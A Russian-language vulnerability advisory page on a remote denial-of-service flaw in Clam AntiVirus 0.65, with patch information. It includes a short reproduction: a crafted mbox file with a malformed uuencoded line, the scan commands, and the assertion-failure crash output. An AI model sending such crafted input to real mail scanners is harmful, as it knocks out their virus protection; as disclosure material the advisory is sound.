Удаленый отказ в обслуживании против Clam AntiVirus

Дата публикации:
13.02.2004
Дата изменения:
17.10.2006
Всего просмотров:
1037
Опасность:
Средняя
Наличие исправления:
Да
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Удаленная
Воздействие:
Отказ в обслуживании
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Clam AntiVirus (clamav) 0.x
Уязвимые версии: Clam AntiVirus 0.65

Описание: Уязвимость обнаружена в Clam AntiVirus. Удаленный пользователь может аварийно завершить работу программы.

Удаленный пользователь может послать email сообщение, содержащее uuencoded строку с некорректным значением длины через email сообщение, чтобы аварийно завершить работу антивируса.

Пример/Эксплоит:

>How-To-Repeat:

Save the following file to ~/clamtest.mbox, removing the leading 'X':

XFrom -
 
Xbegin 644 byebye
Xbyebye
Xend

Then do:

# clamscan --mbox -v ~/clamtest.mbox
assertion "(len >= 0) && (len <= 63)" failed: file "message.c", lin
e 887
Abort (core dumped)

or

# clamdscan -v ~/clamtest.mbox; ps ax | grep clam

URL производителя: http://www.clamav.net/

Решение:Неофициальное исправление см. в источнике сообщения.

Ссылки: clamav 0.65 remote DOS exploit

или введите имя

CAPTCHA